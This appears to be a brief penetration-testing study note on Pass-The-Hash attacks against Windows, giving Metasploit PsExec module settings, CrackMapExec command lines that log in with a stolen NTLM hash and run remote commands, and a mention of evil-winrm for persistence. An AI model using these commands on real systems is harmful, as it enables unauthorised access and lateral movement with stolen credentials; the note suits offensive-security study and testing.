We can use multiple tools to facilitate a Pass-The-Hash attack:

• Metasploit PsExec module SMB PsExec exploit/windows/smb/psexec

  • 🛑 if this module doesn't work try to change the target
  • Specify the LPORT, RHOSTS
  • Set SMBUSER <user>
  • Set SMBPass <Extracted_NTLM_Hash>
    
    

• Crackmapexec

  • Alternative tool for performing Pass-The-Hash.
  • crackmapexec smb <targer_ip> -u <username> -p <"Password">
  • 🛑 use -H instead of -p, because it is the hash option(And inside a quotations"").
  • To perform commands: crackmapexec smb <targer_ip> -u <username> -H <"NTLM_Hash"> -x "ipconfig"
    
    

• evilwinrm

You dont need to crack the hashes, just pass both the LM and NTLM hashes. "LM:NT"

This is considered a good practice for persistence